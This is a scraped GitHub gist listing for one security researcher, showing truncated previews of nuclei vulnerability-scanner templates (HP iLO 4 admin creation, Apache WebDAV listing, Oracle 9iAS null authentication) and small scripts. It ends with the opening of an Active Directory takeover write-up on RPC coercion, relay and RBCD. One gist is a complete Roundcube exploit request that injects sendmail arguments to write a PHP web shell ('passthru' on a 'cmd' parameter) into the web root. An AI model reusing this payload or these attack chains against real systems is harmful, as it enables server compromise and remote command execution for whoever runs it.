This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # @ih3bski | |
| from flask import Flask | |
| from flask_sqlalchemy import SQLAlchemy | |
| import uuid | |
| from loguru import logger | |
| import sys | |
| app = Flask(__name__) |
ihebski
/ hp-ilo4-CVE-2017-12542.yaml
Created
September 22, 2020 11:51
nuclei template for [CVE-2017-12542] iLO 4 < 2.53 - Add New Administrator User
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2017-12542 | |
| info: | |
| name: iLO 4 < 2.53 - Add New Administrator User | |
| author: segfolt | |
| severity: High | |
| # Exploit Source: https://www.exploit-db.com/exploits/44005 | |
| # Reference: https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbhf03769en_us | |
| requests: | |
| - raw: |
ihebski
/ apache-webdav-directory-listing.yaml
Last active
December 18, 2023 06:50
nuclei template for Apache WebDAV Module PROPFIND Arbitrary Directory Listing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: apache-webdav-dir-listing | |
| info: | |
| name: Apache WebDAV Module PROPFIND Arbitrary Directory Listing | |
| author: segfolt | |
| severity: Medium | |
| # https://vuldb.com/?id.16000 | |
| requests: | |
| - raw: |
ihebski
/ CVE-2002-0561.yaml
Created
September 23, 2020 09:51
nuclei template for [CVE-2002-0561] Oracle 9iAS PL/SQL Gateway Web Admin Interface Null Authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2002-0561 | |
| info: | |
| name: Oracle 9iAS PL/SQL Gateway Web Admin Interface Null Authentication | |
| author: Segfolt | |
| severity: High | |
| requests: | |
| - method: GET | |
| path: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hello |
ihebski
/ gist:3073daff8e831ae899ab9049d57a651e
Created
October 20, 2020 20:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from furl import furl | |
| def param_extract(response, level, black_list, placeholder): | |
| ''' | |
| regexp : r'.*?:\/\/.*\?.*\=[^$]' | |
| regexp : r'.*?:\/\/.*\?.*\=' | |
| ''' |
ihebski
/ gist:c5c800f3b47b6321639d3562e03ba49b
Created
November 17, 2020 22:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _token=VufHk5rpfJAVvw0SYqCYDZVUK4pKbgVy&_task=mail&_action=send&_id=19306581945fb451c9405a8&_attachments=&_from=example@example.com -OQueueDirectory=/tmp -X/var/www/html/roundcube/backdoor4.php&_to=example@pWnexAmplE.sh&_cc=&_bcc=&_replyto=&_followupto=&_subject=<?php echo passthru($_GET['cmd']); ?>&editorSelector=plain&_priority=0&_store_target=&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=pwn |
ihebski
/ 100.release-setup
Last active
July 21, 2021 16:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env perl | |
| # Help the initial setup of configurable parameters. | |
| # If not yet available, create/update a generic $home/lib/setup-generic | |
| # Also, create/update a release specific config $home/lib/setup-$version | |
| # Chicken' egg situation: the parameters may have been passed to the | |
| # install script, but we may not have the required module installed to | |
| # process it. The values were passed via environment variables. | |
| use warnings; |
ihebski
/ Workstation-Takeover.md
Created
July 28, 2021 11:36
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.